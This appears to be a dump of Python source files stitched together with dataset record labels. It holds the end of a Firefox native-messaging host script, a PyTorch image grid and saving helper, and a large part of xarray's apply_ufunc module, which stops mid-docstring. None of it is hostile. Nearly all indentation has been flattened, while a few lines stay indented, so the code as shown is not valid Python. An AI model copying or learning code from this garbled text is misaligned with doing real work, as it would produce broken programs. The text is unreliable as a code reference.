# from, say, Firefox. The real fix is to modify `launchd.conf`, but that's
# invasive and maybe not what users want in the general case.
# Hence this nasty hack.
if platform.system() == "Darwin":
path = os.environ.get("PATH")
os.environ["PATH"] = f"/usr/local/bin:{path}"
process = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE,**kwargs)
pOut, pErr = process.communicate() # @see https://docs.python.org/3/library/subprocess.html#subprocess.Popen.communicate
# Need to respond something to avoid "Error: An unexpected error occurred"
# in Browser Console.
    if "ERROR" not in str(pOut):
        send_message("ok")
    else:
        send_message(pOut.decode("utf-8"))
# https://developer.mozilla.org/en-US/Add-ons/WebExtensions/Native_messaging#App_side
def get_message():
raw_length = sys.stdin.buffer.read(4)
if not raw_length:
return {}
length = struct.unpack("@I", raw_length)[0]
message = sys.stdin.buffer.read(length).decode("utf-8")
return json.loads(message)
def send_message(message):
content = json.dumps(message).encode("utf-8")
length = struct.pack("@I", len(content))
sys.stdout.buffer.write(length)
sys.stdout.buffer.write(content)
sys.stdout.buffer.flush()
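# Example of the framing implemented above: send_message("ok") writes the 4-byte
# native-endian length header struct.pack("@I", 4) followed by the UTF-8 JSON
# payload b'"ok"', as required by the WebExtensions native messaging protocol.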
if __name__ == "__main__":
main()
|
the-stack_0_1574 | """ @ saving utils
"""
import math
import torch
from torchvision import utils
import matplotlib.pyplot as plt
from PIL import Image
from torchvision import transforms
def numpy_grid(x, pad=0, nrow=None, uint8=True):
""" thin wrap to make_grid to return frames ready to save to file
args
pad (int [0]) same as utils.make_grid(padding)
nrow (int [None]) # defaults to horizonally biased rectangle closest to square
uint8 (bool [True]) convert to img in range 0-255 uint8
"""
x = x.clone().detach().cpu()
nrow = nrow or int(math.sqrt(x.shape[0]))
x = ((utils.make_grid(x, nrow=nrow, padding=pad).permute(1,2,0) - x.min())/(x.max()-x.min())).numpy()
if uint8:
x = (x*255).astype("uint8")
return x
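# Usage sketch (tensor values assumed): numpy_grid(torch.rand(16, 3, 64, 64), pad=2)
# returns a uint8 array of shape (H, W, 3) laid out as a 4 x 4 grid of the 16 images,
# because nrow defaults to int(math.sqrt(16)) == 4.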
def to_image(image, save=True, show=True, pad=1):
""" util tensor to image, show, save
"""
image = numpy_grid(image, pad=pad)
if save:
im = Image.fromarray(image)
im.save(save)
print(f"saved image {save}")
if show:
plt.imshow(image)
plt.axis("off")
plt.show()
return image
def strf(x):
""" format time output
strf = lambda x: f"{int(x//86400)}D{int((x//3600)%24):02d}:{int((x//60)%60):02d}:{int(x%60):02d}s"
"""
days = int(x//86400)
hours = int((x//3600)%24)
minutes = int((x//60)%60)
seconds = int(x%60)
out = f"{minutes:02d}:{seconds:02d}"
if hours or days:
out = f"{hours:02d}:{out}"
if days:
out = f"{days}_{out}"
return out
# pylint: disable=no-member
def open_image(path, channels=3, image_size=128):
""" open img with same transforms as ddpm dataset
"""
if isinstance(path, (list, tuple)):
return torch.cat([open_image(p, channels=channels, image_size=image_size)
for p in path])
img = Image.open(path)
if channels == 1:
img = img.convert('L')
else:
img = img.convert('RGB')
transform = transforms.Compose([
transforms.Resize(image_size),
transforms.RandomHorizontalFlip(),
transforms.CenterCrop(image_size),
transforms.ToTensor(),
transforms.Lambda(lambda t: (t * 2) - 1)
])
return transform(img)[None,...]
|
the-stack_0_1576 | """
Functions for applying functions that act on arrays to xarray's labeled data.
"""
from __future__ import annotations
import functools
import itertools
import operator
import warnings
from collections import Counter
from typing import (
TYPE_CHECKING,
AbstractSet,
Any,
Callable,
Hashable,
Iterable,
Mapping,
Sequence,
overload,
)
import numpy as np
from . import dtypes, duck_array_ops, utils
from .alignment import align, deep_align
from .common import zeros_like
from .duck_array_ops import datetime_to_numeric
from .indexes import Index, filter_indexes_from_coords
from .merge import merge_attrs, merge_coordinates_without_align
from .options import OPTIONS, _get_keep_attrs
from .pycompat import is_duck_dask_array
from .utils import is_dict_like
from .variable import Variable
if TYPE_CHECKING:
from .coordinates import Coordinates
from .dataarray import DataArray
from .dataset import Dataset
from .types import T_Xarray
_NO_FILL_VALUE = utils.ReprObject("<no-fill-value>")
_DEFAULT_NAME = utils.ReprObject("<default-name>")
_JOINS_WITHOUT_FILL_VALUES = frozenset({"inner", "exact"})
def _first_of_type(args, kind):
"""Return either first object of type 'kind' or raise if not found."""
for arg in args:
if isinstance(arg, kind):
return arg
raise ValueError("This should be unreachable.")
def _all_of_type(args, kind):
"""Return all objects of type 'kind'"""
return [arg for arg in args if isinstance(arg, kind)]
class _UFuncSignature:
"""Core dimensions signature for a given function.
Based on the signature provided by generalized ufuncs in NumPy.
Attributes
----------
input_core_dims : tuple[tuple]
Core dimension names on each input variable.
output_core_dims : tuple[tuple]
Core dimension names on each output variable.
"""
__slots__ = (
"input_core_dims",
"output_core_dims",
"_all_input_core_dims",
"_all_output_core_dims",
"_all_core_dims",
)
def __init__(self, input_core_dims, output_core_dims=((),)):
self.input_core_dims = tuple(tuple(a) for a in input_core_dims)
self.output_core_dims = tuple(tuple(a) for a in output_core_dims)
self._all_input_core_dims = None
self._all_output_core_dims = None
self._all_core_dims = None
@property
def all_input_core_dims(self):
if self._all_input_core_dims is None:
self._all_input_core_dims = frozenset(
dim for dims in self.input_core_dims for dim in dims
)
return self._all_input_core_dims
@property
def all_output_core_dims(self):
if self._all_output_core_dims is None:
self._all_output_core_dims = frozenset(
dim for dims in self.output_core_dims for dim in dims
)
return self._all_output_core_dims
@property
def all_core_dims(self):
if self._all_core_dims is None:
self._all_core_dims = self.all_input_core_dims | self.all_output_core_dims
return self._all_core_dims
@property
def dims_map(self):
return {
core_dim: f"dim{n}" for n, core_dim in enumerate(sorted(self.all_core_dims))
}
@property
def num_inputs(self):
return len(self.input_core_dims)
@property
def num_outputs(self):
return len(self.output_core_dims)
def __eq__(self, other):
try:
return (
self.input_core_dims == other.input_core_dims
and self.output_core_dims == other.output_core_dims
)
except AttributeError:
return False
def __ne__(self, other):
return not self == other
def __repr__(self):
return "{}({!r}, {!r})".format(
type(self).__name__,
list(self.input_core_dims),
list(self.output_core_dims),
)
def __str__(self):
lhs = ",".join("({})".format(",".join(dims)) for dims in self.input_core_dims)
rhs = ",".join("({})".format(",".join(dims)) for dims in self.output_core_dims)
return f"{lhs}->{rhs}"
def to_gufunc_string(self, exclude_dims=frozenset()):
"""Create an equivalent signature string for a NumPy gufunc.
Unlike __str__, handles dimensions that don't map to Python
identifiers.
Also creates unique names for input_core_dims contained in exclude_dims.
"""
input_core_dims = [
[self.dims_map[dim] for dim in core_dims]
for core_dims in self.input_core_dims
]
output_core_dims = [
[self.dims_map[dim] for dim in core_dims]
for core_dims in self.output_core_dims
]
# enumerate input_core_dims contained in exclude_dims to make them unique
if exclude_dims:
exclude_dims = [self.dims_map[dim] for dim in exclude_dims]
counter = Counter()
def _enumerate(dim):
if dim in exclude_dims:
n = counter[dim]
counter.update([dim])
dim = f"{dim}_{n}"
return dim
input_core_dims = [
[_enumerate(dim) for dim in arg] for arg in input_core_dims
]
alt_signature = type(self)(input_core_dims, output_core_dims)
return str(alt_signature)
def result_name(objects: list) -> Any:
# use the same naming heuristics as pandas:
# https://github.com/blaze/blaze/issues/458#issuecomment-51936356
names = {getattr(obj, "name", _DEFAULT_NAME) for obj in objects}
names.discard(_DEFAULT_NAME)
if len(names) == 1:
(name,) = names
else:
name = None
return name
def _get_coords_list(args) -> list[Coordinates]:
coords_list = []
for arg in args:
try:
coords = arg.coords
except AttributeError:
pass # skip this argument
else:
coords_list.append(coords)
return coords_list
def build_output_coords_and_indexes(
args: list,
signature: _UFuncSignature,
exclude_dims: AbstractSet = frozenset(),
combine_attrs: str = "override",
) -> tuple[list[dict[Any, Variable]], list[dict[Any, Index]]]:
"""Build output coordinates and indexes for an operation.
Parameters
----------
args : list
List of raw operation arguments. Any valid types for xarray operations
are OK, e.g., scalars, Variable, DataArray, Dataset.
signature : _UfuncSignature
Core dimensions signature for the operation.
exclude_dims : set, optional
Dimensions excluded from the operation. Coordinates along these
dimensions are dropped.
Returns
-------
Dictionaries of Variable and Index objects with merged coordinates.
"""
coords_list = _get_coords_list(args)
if len(coords_list) == 1 and not exclude_dims:
# we can skip the expensive merge
(unpacked_coords,) = coords_list
merged_vars = dict(unpacked_coords.variables)
merged_indexes = dict(unpacked_coords.xindexes)
else:
merged_vars, merged_indexes = merge_coordinates_without_align(
coords_list, exclude_dims=exclude_dims, combine_attrs=combine_attrs
)
output_coords = []
output_indexes = []
for output_dims in signature.output_core_dims:
dropped_dims = signature.all_input_core_dims - set(output_dims)
if dropped_dims:
filtered_coords = {
k: v for k, v in merged_vars.items() if dropped_dims.isdisjoint(v.dims)
}
filtered_indexes = filter_indexes_from_coords(
merged_indexes, set(filtered_coords)
)
else:
filtered_coords = merged_vars
filtered_indexes = merged_indexes
output_coords.append(filtered_coords)
output_indexes.append(filtered_indexes)
return output_coords, output_indexes
def apply_dataarray_vfunc(
func,
*args,
signature,
join="inner",
exclude_dims=frozenset(),
keep_attrs="override",
):
"""Apply a variable level function over DataArray, Variable and/or ndarray
objects.
"""
from .dataarray import DataArray
if len(args) > 1:
args = deep_align(
args, join=join, copy=False, exclude=exclude_dims, raise_on_invalid=False
)
objs = _all_of_type(args, DataArray)
if keep_attrs == "drop":
name = result_name(args)
else:
first_obj = _first_of_type(args, DataArray)
name = first_obj.name
result_coords, result_indexes = build_output_coords_and_indexes(
args, signature, exclude_dims, combine_attrs=keep_attrs
)
data_vars = [getattr(a, "variable", a) for a in args]
result_var = func(*data_vars)
if signature.num_outputs > 1:
out = tuple(
DataArray(
variable, coords=coords, indexes=indexes, name=name, fastpath=True
)
for variable, coords, indexes in zip(
result_var, result_coords, result_indexes
)
)
else:
(coords,) = result_coords
(indexes,) = result_indexes
out = DataArray(
result_var, coords=coords, indexes=indexes, name=name, fastpath=True
)
attrs = merge_attrs([x.attrs for x in objs], combine_attrs=keep_attrs)
if isinstance(out, tuple):
for da in out:
da.attrs = attrs
else:
out.attrs = attrs
return out
def ordered_set_union(all_keys: list[Iterable]) -> Iterable:
return {key: None for keys in all_keys for key in keys}.keys()
def ordered_set_intersection(all_keys: list[Iterable]) -> Iterable:
intersection = set(all_keys[0])
for keys in all_keys[1:]:
intersection.intersection_update(keys)
return [key for key in all_keys[0] if key in intersection]
def assert_and_return_exact_match(all_keys):
first_keys = all_keys[0]
for keys in all_keys[1:]:
if keys != first_keys:
raise ValueError(
"exact match required for all data variable names, "
f"but {keys!r} != {first_keys!r}"
)
return first_keys
_JOINERS: dict[str, Callable] = {
"inner": ordered_set_intersection,
"outer": ordered_set_union,
"left": operator.itemgetter(0),
"right": operator.itemgetter(-1),
"exact": assert_and_return_exact_match,
}
def join_dict_keys(objects: Iterable[Mapping | Any], how: str = "inner") -> Iterable:
joiner = _JOINERS[how]
all_keys = [obj.keys() for obj in objects if hasattr(obj, "keys")]
return joiner(all_keys)
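# For example, given two dict-like arguments with keys ("a", "b") and ("b", "c"):
# how="inner" yields ["b"], how="outer" yields the keys in first-seen order
# ("a", "b", "c"), and how="left" keeps only the first object's keys.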
def collect_dict_values(
objects: Iterable[Mapping | Any], keys: Iterable, fill_value: object = None
) -> list[list]:
return [
[obj.get(key, fill_value) if is_dict_like(obj) else obj for obj in objects]
for key in keys
]
def _as_variables_or_variable(arg):
try:
return arg.variables
except AttributeError:
try:
return arg.variable
except AttributeError:
return arg
def _unpack_dict_tuples(
result_vars: Mapping[Any, tuple[Variable, ...]], num_outputs: int
) -> tuple[dict[Hashable, Variable], ...]:
out: tuple[dict[Hashable, Variable], ...] = tuple({} for _ in range(num_outputs))
for name, values in result_vars.items():
for value, results_dict in zip(values, out):
results_dict[name] = value
return out
def apply_dict_of_variables_vfunc(
func, *args, signature, join="inner", fill_value=None
):
"""Apply a variable level function over dicts of DataArray, DataArray,
Variable and ndarray objects.
"""
args = [_as_variables_or_variable(arg) for arg in args]
names = join_dict_keys(args, how=join)
grouped_by_name = collect_dict_values(args, names, fill_value)
result_vars = {}
for name, variable_args in zip(names, grouped_by_name):
result_vars[name] = func(*variable_args)
if signature.num_outputs > 1:
return _unpack_dict_tuples(result_vars, signature.num_outputs)
else:
return result_vars
def _fast_dataset(
variables: dict[Hashable, Variable],
coord_variables: Mapping[Hashable, Variable],
indexes: dict[Hashable, Index],
) -> Dataset:
"""Create a dataset as quickly as possible.
Beware: the `variables` dict is modified INPLACE.
"""
from .dataset import Dataset
variables.update(coord_variables)
coord_names = set(coord_variables)
return Dataset._construct_direct(variables, coord_names, indexes=indexes)
def apply_dataset_vfunc(
func,
*args,
signature,
join="inner",
dataset_join="exact",
fill_value=_NO_FILL_VALUE,
exclude_dims=frozenset(),
keep_attrs="override",
):
"""Apply a variable level function over Dataset, dict of DataArray,
DataArray, Variable and/or ndarray objects.
"""
from .dataset import Dataset
if dataset_join not in _JOINS_WITHOUT_FILL_VALUES and fill_value is _NO_FILL_VALUE:
raise TypeError(
"to apply an operation to datasets with different "
"data variables with apply_ufunc, you must supply the "
"dataset_fill_value argument."
)
objs = _all_of_type(args, Dataset)
if len(args) > 1:
args = deep_align(
args, join=join, copy=False, exclude=exclude_dims, raise_on_invalid=False
)
list_of_coords, list_of_indexes = build_output_coords_and_indexes(
args, signature, exclude_dims, combine_attrs=keep_attrs
)
args = [getattr(arg, "data_vars", arg) for arg in args]
result_vars = apply_dict_of_variables_vfunc(
func, *args, signature=signature, join=dataset_join, fill_value=fill_value
)
if signature.num_outputs > 1:
out = tuple(
_fast_dataset(*args)
for args in zip(result_vars, list_of_coords, list_of_indexes)
)
else:
(coord_vars,) = list_of_coords
(indexes,) = list_of_indexes
out = _fast_dataset(result_vars, coord_vars, indexes=indexes)
attrs = merge_attrs([x.attrs for x in objs], combine_attrs=keep_attrs)
if isinstance(out, tuple):
for ds in out:
ds.attrs = attrs
else:
out.attrs = attrs
return out
def _iter_over_selections(obj, dim, values):
"""Iterate over selections of an xarray object in the provided order."""
from .groupby import _dummy_copy
dummy = None
for value in values:
try:
obj_sel = obj.sel(**{dim: value})
except (KeyError, IndexError):
if dummy is None:
dummy = _dummy_copy(obj)
obj_sel = dummy
yield obj_sel
def apply_groupby_func(func, *args):
"""Apply a dataset or datarray level function over GroupBy, Dataset,
DataArray, Variable and/or ndarray objects.
"""
from .groupby import GroupBy, peek_at
from .variable import Variable
groupbys = [arg for arg in args if isinstance(arg, GroupBy)]
assert groupbys, "must have at least one groupby to iterate over"
first_groupby = groupbys[0]
if any(not first_groupby._group.equals(gb._group) for gb in groupbys[1:]):
raise ValueError(
"apply_ufunc can only perform operations over "
"multiple GroupBy objects at once if they are all "
"grouped the same way"
)
grouped_dim = first_groupby._group.name
unique_values = first_groupby._unique_coord.values
iterators = []
for arg in args:
if isinstance(arg, GroupBy):
iterator = (value for _, value in arg)
elif hasattr(arg, "dims") and grouped_dim in arg.dims:
if isinstance(arg, Variable):
raise ValueError(
"groupby operations cannot be performed with "
"xarray.Variable objects that share a dimension with "
"the grouped dimension"
)
iterator = _iter_over_selections(arg, grouped_dim, unique_values)
else:
iterator = itertools.repeat(arg)
iterators.append(iterator)
applied = (func(*zipped_args) for zipped_args in zip(*iterators))
applied_example, applied = peek_at(applied)
combine = first_groupby._combine
if isinstance(applied_example, tuple):
combined = tuple(combine(output) for output in zip(*applied))
else:
combined = combine(applied)
return combined
def unified_dim_sizes(
variables: Iterable[Variable], exclude_dims: AbstractSet = frozenset()
) -> dict[Hashable, int]:
dim_sizes: dict[Hashable, int] = {}
for var in variables:
if len(set(var.dims)) < len(var.dims):
raise ValueError(
"broadcasting cannot handle duplicate "
f"dimensions on a variable: {list(var.dims)}"
)
for dim, size in zip(var.dims, var.shape):
if dim not in exclude_dims:
if dim not in dim_sizes:
dim_sizes[dim] = size
elif dim_sizes[dim] != size:
raise ValueError(
"operands cannot be broadcast together "
"with mismatched lengths for dimension "
f"{dim}: {dim_sizes[dim]} vs {size}"
)
return dim_sizes
SLICE_NONE = slice(None)
def broadcast_compat_data(
variable: Variable,
broadcast_dims: tuple[Hashable, ...],
core_dims: tuple[Hashable, ...],
) -> Any:
data = variable.data
old_dims = variable.dims
new_dims = broadcast_dims + core_dims
if new_dims == old_dims:
# optimize for the typical case
return data
set_old_dims = set(old_dims)
missing_core_dims = [d for d in core_dims if d not in set_old_dims]
if missing_core_dims:
raise ValueError(
"operand to apply_ufunc has required core dimensions {}, but "
"some of these dimensions are absent on an input variable: {}".format(
list(core_dims), missing_core_dims
)
)
set_new_dims = set(new_dims)
unexpected_dims = [d for d in old_dims if d not in set_new_dims]
if unexpected_dims:
raise ValueError(
"operand to apply_ufunc encountered unexpected "
f"dimensions {unexpected_dims!r} on an input variable: these are core "
"dimensions on other input or output variables"
)
# for consistency with numpy, keep broadcast dimensions to the left
old_broadcast_dims = tuple(d for d in broadcast_dims if d in set_old_dims)
reordered_dims = old_broadcast_dims + core_dims
if reordered_dims != old_dims:
order = tuple(old_dims.index(d) for d in reordered_dims)
data = duck_array_ops.transpose(data, order)
if new_dims != reordered_dims:
key_parts: list[slice | None] = []
for dim in new_dims:
if dim in set_old_dims:
key_parts.append(SLICE_NONE)
elif key_parts:
# no need to insert new axes at the beginning that are already
# handled by broadcasting
key_parts.append(np.newaxis)
data = data[tuple(key_parts)]
return data
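# Worked example for the reordering above (dimension names assumed): a Variable with
# dims ("time", "x"), broadcast_dims=("y", "time") and core_dims=("x",) keeps its data
# with shape (time, x); the missing leading "y" axis is left to NumPy broadcasting,
# because new axes are only inserted after the first already-present broadcast dimension.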
def _vectorize(func, signature, output_dtypes, exclude_dims):
if signature.all_core_dims:
func = np.vectorize(
func,
otypes=output_dtypes,
signature=signature.to_gufunc_string(exclude_dims),
)
else:
func = np.vectorize(func, otypes=output_dtypes)
return func
def apply_variable_ufunc(
func,
*args,
signature,
exclude_dims=frozenset(),
dask="forbidden",
output_dtypes=None,
vectorize=False,
keep_attrs="override",
dask_gufunc_kwargs=None,
):
"""Apply a ndarray level function over Variable and/or ndarray objects."""
from .variable import Variable, as_compatible_data
dim_sizes = unified_dim_sizes(
(a for a in args if hasattr(a, "dims")), exclude_dims=exclude_dims
)
broadcast_dims = tuple(
dim for dim in dim_sizes if dim not in signature.all_core_dims
)
output_dims = [broadcast_dims + out for out in signature.output_core_dims]
input_data = [
broadcast_compat_data(arg, broadcast_dims, core_dims)
if isinstance(arg, Variable)
else arg
for arg, core_dims in zip(args, signature.input_core_dims)
]
if any(is_duck_dask_array(array) for array in input_data):
if dask == "forbidden":
raise ValueError(
"apply_ufunc encountered a dask array on an "
"argument, but handling for dask arrays has not "
"been enabled. Either set the ``dask`` argument "
"or load your data into memory first with "
"``.load()`` or ``.compute()``"
)
elif dask == "parallelized":
numpy_func = func
if dask_gufunc_kwargs is None:
dask_gufunc_kwargs = {}
else:
dask_gufunc_kwargs = dask_gufunc_kwargs.copy()
allow_rechunk = dask_gufunc_kwargs.get("allow_rechunk", None)
if allow_rechunk is None:
for n, (data, core_dims) in enumerate(
zip(input_data, signature.input_core_dims)
):
if is_duck_dask_array(data):
# core dimensions cannot span multiple chunks
for axis, dim in enumerate(core_dims, start=-len(core_dims)):
if len(data.chunks[axis]) != 1:
raise ValueError(
f"dimension {dim} on {n}th function argument to "
"apply_ufunc with dask='parallelized' consists of "
"multiple chunks, but is also a core dimension. To "
"fix, either rechunk into a single dask array chunk along "
f"this dimension, i.e., ``.chunk(dict({dim}=-1))``, or "
"pass ``allow_rechunk=True`` in ``dask_gufunc_kwargs`` "
"but beware that this may significantly increase memory usage."
)
dask_gufunc_kwargs["allow_rechunk"] = True
output_sizes = dask_gufunc_kwargs.pop("output_sizes", {})
if output_sizes:
output_sizes_renamed = {}
for key, value in output_sizes.items():
if key not in signature.all_output_core_dims:
raise ValueError(
f"dimension '{key}' in 'output_sizes' must correspond to output_core_dims"
)
output_sizes_renamed[signature.dims_map[key]] = value
dask_gufunc_kwargs["output_sizes"] = output_sizes_renamed
for key in signature.all_output_core_dims:
if key not in signature.all_input_core_dims and key not in output_sizes:
raise ValueError(
f"dimension '{key}' in 'output_core_dims' needs corresponding (dim, size) in 'output_sizes'"
)
def func(*arrays):
import dask.array as da
res = da.apply_gufunc(
numpy_func,
signature.to_gufunc_string(exclude_dims),
*arrays,
vectorize=vectorize,
output_dtypes=output_dtypes,
**dask_gufunc_kwargs,
)
return res
elif dask == "allowed":
pass
else:
raise ValueError(
"unknown setting for dask array handling in "
"apply_ufunc: {}".format(dask)
)
else:
if vectorize:
func = _vectorize(
func, signature, output_dtypes=output_dtypes, exclude_dims=exclude_dims
)
result_data = func(*input_data)
if signature.num_outputs == 1:
result_data = (result_data,)
elif (
not isinstance(result_data, tuple) or len(result_data) != signature.num_outputs
):
raise ValueError(
"applied function does not have the number of "
"outputs specified in the ufunc signature. "
"Result is not a tuple of {} elements: {!r}".format(
signature.num_outputs, result_data
)
)
objs = _all_of_type(args, Variable)
attrs = merge_attrs(
[obj.attrs for obj in objs],
combine_attrs=keep_attrs,
)
output = []
for dims, data in zip(output_dims, result_data):
data = as_compatible_data(data)
if data.ndim != len(dims):
raise ValueError(
"applied function returned data with unexpected "
f"number of dimensions. Received {data.ndim} dimension(s) but "
f"expected {len(dims)} dimensions with names: {dims!r}"
)
var = Variable(dims, data, fastpath=True)
for dim, new_size in var.sizes.items():
if dim in dim_sizes and new_size != dim_sizes[dim]:
raise ValueError(
"size of dimension {!r} on inputs was unexpectedly "
"changed by applied function from {} to {}. Only "
"dimensions specified in ``exclude_dims`` with "
"xarray.apply_ufunc are allowed to change size.".format(
dim, dim_sizes[dim], new_size
)
)
var.attrs = attrs
output.append(var)
if signature.num_outputs == 1:
return output[0]
else:
return tuple(output)
def apply_array_ufunc(func, *args, dask="forbidden"):
"""Apply a ndarray level function over ndarray objects."""
if any(is_duck_dask_array(arg) for arg in args):
if dask == "forbidden":
raise ValueError(
"apply_ufunc encountered a dask array on an "
"argument, but handling for dask arrays has not "
"been enabled. Either set the ``dask`` argument "
"or load your data into memory first with "
"``.load()`` or ``.compute()``"
)
elif dask == "parallelized":
raise ValueError(
"cannot use dask='parallelized' for apply_ufunc "
"unless at least one input is an xarray object"
)
elif dask == "allowed":
pass
else:
raise ValueError(f"unknown setting for dask array handling: {dask}")
return func(*args)
def apply_ufunc(
func: Callable,
*args: Any,
input_core_dims: Sequence[Sequence] = None,
output_core_dims: Sequence[Sequence] | None = ((),),
exclude_dims: AbstractSet = frozenset(),
vectorize: bool = False,
join: str = "exact",
dataset_join: str = "exact",
dataset_fill_value: object = _NO_FILL_VALUE,
keep_attrs: bool | str | None = None,
kwargs: Mapping | None = None,
dask: str = "forbidden",
output_dtypes: Sequence | None = None,
output_sizes: Mapping[Any, int] | None = None,
meta: Any = None,
dask_gufunc_kwargs: dict[str, Any] | None = None,
) -> Any:
"""Apply a vectorized function for unlabeled arrays on xarray objects.
The function will be mapped over the data variable(s) of the input
arguments using xarray's standard rules for labeled computation, including
alignment, broadcasting, looping over GroupBy/Dataset variables, and
merging of coordinates.
Parameters
----------
func : callable
Function to call like ``func(*args, **kwargs)`` on unlabeled arrays
(``.data``) that returns an array or tuple of arrays. If multiple
arguments with non-matching dimensions are supplied, this function is
expected to vectorize (broadcast) over axes of positional arguments in
the style of NumPy universal functions [1]_ (if this is not the case,
set ``vectorize=True``). If this function returns multiple outputs, you
must set ``output_core_dims`` as well.
*args : Dataset, DataArray, DataArrayGroupBy, DatasetGroupBy, Variable, numpy.ndarray, dask.array.Array or scalar
Mix of labeled and/or unlabeled arrays to which to apply the function.
input_core_dims : sequence of sequence, optional
List of the same length as ``args`` giving the list of core dimensions
on each input argument that should not be broadcast. By default, we
assume there are no core dimensions on any input arguments.
For example, ``input_core_dims=[[], ['time']]`` indicates that all
dimensions on the first argument and all dimensions other than 'time'
on the second argument should be broadcast.
Core dimensions are automatically moved to the last axes of input
variables before applying ``func``, which facilitates using NumPy style
generalized ufuncs [2]_.
output_core_dims : list of tuple, optional
List of the same length as the number of output arguments from
``func``, giving the list of core dimensions on each output that were
not broadcast on the inputs. By default, we assume that ``func``
outputs exactly one array, with axes corresponding to each broadcast
dimension.
Core dimensions are assumed to appear as the last dimensions of each
output in the provided order.
exclude_dims : set, optional
Core dimensions on the inputs to exclude from alignment and
broadcasting entirely. Any input coordinates along these dimensions
will be dropped. Each excluded dimension must also appear in
``input_core_dims`` for at least one argument. Only dimensions listed
here are allowed to change size between input and output objects.
vectorize : bool, optional
If True, then assume ``func`` only takes arrays defined over core
dimensions as input and vectorize it automatically with
:py:func:`numpy.vectorize`. This option exists for convenience, but is
almost always slower than supplying a pre-vectorized function.
Using this option requires NumPy version 1.12 or newer.
join : {"outer", "inner", "left", "right", "exact"}, default: "exact"
Method for joining the indexes of the passed objects along each
dimension, and the variables of Dataset objects with mismatched
data variables:
- 'outer': use the union of object indexes
- 'inner': use the intersection of object indexes
- 'left': use indexes from the first object with each dimension
- 'right': use indexes from the last object with each dimension
- 'exact': raise `ValueError` instead of aligning when indexes to be
aligned are not equal
dataset_join : {"outer", "inner", "left", "right", "exact"}, default: "exact"
Method for joining variables of Dataset objects with mismatched
data variables.
- 'outer': take variables from both Dataset objects
- 'inner': take only overlapped variables
- 'left': take only variables from the first object
- 'right': take only variables from the last object
- 'exact': data variables on all Dataset objects must match exactly
dataset_fill_value : optional
Value used in place of missing variables on Dataset inputs when the
datasets do not share the exact same ``data_vars``. Required if
``dataset_join not in {'inner', 'exact'}``, otherwise ignored.
keep_attrs : bool, optional
Whether to copy attributes from the first argument to the output.
kwargs : dict, optional
Optional keyword arguments passed directly on to call ``func``.
dask : {"forbidden", "allowed", "parallelized"}, default: "forbidden"
How to handle applying to objects containing lazy data in the form of
dask arrays:
- 'forbidden' (default): raise an error if a dask array is encountered.
- 'allowed': pass dask arrays directly on to ``func``. Prefer this option if
``func`` natively supports dask arrays.
- 'parallelized': automatically parallelize ``func`` if any of the
inputs are a dask array by using :py:func:`dask.array.apply_gufunc`. Multiple output
arguments are supported. Only use this option if ``func`` does not natively
support dask arrays (e.g. converts them to numpy arrays).
dask_gufunc_kwargs : dict, optional
Optional keyword arguments passed to :py:func:`dask.array.apply_gufunc` if
dask='parallelized'. Possible keywords are ``output_sizes``, ``allow_rechunk``
and ``meta``.
output_dtypes : list of dtype, optional
Optional list of output dtypes. Only used if ``dask='parallelized'`` or
``vectorize=True``.
output_sizes : dict, optional
Optional mapping from dimension names to sizes for outputs. Only used
if dask='parallelized' and new dimensions (not found on inputs) appear
on outputs. ``output_sizes`` should be given in the ``dask_gufunc_kwargs``
        parameter. It will be removed as a direct parameter in a future version.
meta : optional
Size-0 object representing the type of array wrapped by dask array. Passed on to
:py:func:`dask.array.apply_gufunc`. ``meta`` should be given in the
        ``dask_gufunc_kwargs`` parameter. It will be removed as a direct parameter
        in a future version.
Returns
-------
Single value or tuple of Dataset, DataArray, Variable, dask.array.Array or
numpy.ndarray, the first type on that list to appear on an input.
Notes
-----
This function is designed for the more common case where ``func`` can work on numpy
arrays. If ``func`` needs to manipulate a whole xarray object subset to each block
it is possible to use :py:func:`xarray.map_blocks`.
Note that due to the overhead :py:func:`xarray.map_blocks` is considerably slower than ``apply_ufunc``.
Examples
--------
Calculate the vector magnitude of two arguments:
>>> def magnitude(a, b):
... func = lambda x, y: np.sqrt(x**2 + y**2)
... return xr.apply_ufunc(func, a, b)
...
You can now apply ``magnitude()`` to :py:class:`DataArray` and :py:class:`Dataset`
objects, with automatically preserved dimensions and coordinates, e.g.,
>>> array = xr.DataArray([1, 2, 3], coords=[("x", [0.1, 0.2, 0.3])])
>>> magnitude(array, -array)
<xarray.DataArray (x: 3)>
array([1.41421356, 2.82842712, 4.24264069])
Coordinates:
* x (x) float64 0.1 0.2 0.3
Plain scalars, numpy arrays and a mix of these with xarray objects are also
supported:
>>> magnitude(3, 4)
5.0
>>> magnitude(3, np.array([0, 4]))
array([3., 5.])
>>> magnitude(array, 0)
<xarray.DataArray (x: 3)>
array([1., 2., 3.])
Coordinates:
* x (x) float64 0.1 0.2 0.3
Other examples of how you could use ``apply_ufunc`` to write functions to
(very nearly) replicate existing xarray functionality:
Compute the mean (``.mean``) over one dimension:
>>> def mean(obj, dim):
... # note: apply always moves core dimensions to the end
... return apply_ufunc(
... np.mean, obj, input_core_dims=[[dim]], kwargs={"axis": -1}
... )
...
Inner product over a specific dimension (like :py:func:`dot`):
>>> def _inner(x, y):
... result = np.matmul(x[..., np.newaxis, :], y[..., :, np.newaxis])
... return result[..., 0, 0]
...
>>> def inner_product(a, b, dim):
... return apply_ufunc(_inner, a, b, input_core_dims=[[dim], [dim]])
...
Stack objects along a new dimension (like :py:func:`concat`):
>>> def stack(objects, dim, new_coord):
... # note: this version does not stack coordinates
... func = lambda *x: np.stack(x, axis=-1)
... result = apply_ufunc(
... func,
... *objects,
... output_core_dims=[[dim]],
... join="outer",
... dataset_fill_value=np.nan
... )
... result[dim] = new_coord
... return result
...
If your function is not vectorized but can be applied only to core
dimensions, you can use ``vectorize=True`` to turn it into a vectorized
function. This wraps :py:func:`numpy.vectorize`, so the operation isn't
terribly fast. Here we'll use it to calculate the distance between
empirical samples from two probability distributions, using a scipy
function that needs to be applied to vectors:
>>> import scipy.stats
>>> def earth_mover_distance(first_samples, second_samples, dim="ensemble"):
... return apply_ufunc(
... scipy.stats.wasserstein_distance,
... first_samples,
... second_samples,
... input_core_dims=[[dim], [dim]],
... vectorize=True,
... )
...
Most of NumPy's builtin functions already broadcast their inputs
appropriately for use in ``apply_ufunc``. You may find helper functions such as
:py:func:`numpy.broadcast_arrays` helpful in writing your function. ``apply_ufunc`` also
works well with :py:func:`numba.vectorize` and :py:func:`numba.guvectorize`.
See Also
--------
numpy.broadcast_arrays
numba.vectorize
numba.guvectorize
dask.array.apply_gufunc
